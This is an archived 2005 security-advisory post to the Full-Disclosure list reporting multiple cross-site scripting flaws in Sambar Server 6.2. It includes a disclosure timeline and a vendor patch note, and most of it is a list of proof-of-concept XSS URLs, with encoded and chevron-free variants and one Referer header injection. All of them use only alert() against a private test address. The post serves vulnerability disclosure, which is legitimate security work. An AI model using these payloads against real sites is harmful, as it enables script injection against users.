lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050523210229.68980.qmail@web25001.mail.ukl.yahoo.com>
Date: Mon May 23 22:02:35 2005
From: contact_jamie_fisher at yahoo.co.uk (jamie fisher)
Subject: XSS in Sambar Server version 6.2


                     - Sambar - 
AFFECTED PRODUCTS:
================== 
Sambar Server 6.2 
http://www.sambar.com/ 

OVERVIEW: 
=========
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.

HISTORY:
========
17th April 2005 - First discovered
17th April 2005 - Contacted vendor
20th April 2005 - Vendor reply
20th May 2005 - Patch available

DETAILS:
========
Multiple XSS found in the administrative interface.
In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied 
input. A user can input a specially crafted script that when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site. 

ISSUE:
======
Crafted input of causes the application to output what is known as a Cross Site Script.  The script is rendered upon visitation to the affected the page served by the application.
EXAMPLE:
========
Standard XSS within the /search directory:
==========================================
1.
">alert("XSS")&style=fancy&spage=10&query=Folder%name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
2.
%22%27>&style=fancy&spage=10&query=Folder%name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
3.
">alert("XSS")&style=fancy&spage=20&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
4.
%22%27>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
5.
">alert("XSS")&style=fancy&spage=30&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
6.
%22%27>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
7.
">alert("XSS")&style=fancy&spage=40&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
8.
%22%27>&style=fancy&spage=40&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
9.
">alert("XSS")&style=fancy&spage=50&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
10.
%22%27>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
11.
">alert("XSS")&style=fancy&spage=60&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
12.
%22%27>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name
Standard XSS within the /session directory:
===========================================
1.
'>alert('XSS')http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
2.
">alert("XSS")http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
3.
%22%27>http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
HTML XSS within the /search directory:
======================================
1.
"'>&style=fancy&spage=10&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
2.
"'>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
3.
"'>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
4.
"'>http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
5.
"'>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
6.
"'>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name
No chevron '<' '>' XSS within the /search directory:
====================================================
1.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name
Escaping from HTML XSS within the /session directory:
====================================================
1.
alert(%27XSS%27)http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>
Including XSS within referrer:
==============================
1.
GET /CheckingXssInReferer.html HTTP/1.0
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false
Host: 192.168.0.5
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Referer: "></a><script>alert('XSS')</script>

SOLUTION: 
=========
Sambar Server has been contacted and has released patches. 
Note: There were probably a lot more input validation errors but due to a whinning girlfriend work had to be cut short :)

REFERENCE:
==========
http://www.sambar.com/security.htm
http://homepage.hispeed.ch/spamtrap/sambar62p.exe

CREDITS: 
========
Tod Sambar for understanding the issue and resolving in a timely manner.
 
This vulnerability was discovered and researched by Jamie Fisher
mail: contact_jamie_fisher[at]yahoo.co.uk

		
---------------------------------
Yahoo! Messenger NEW - crystal clear PC to PCcalling worldwide with voicemail
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050523/ef7d277a/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ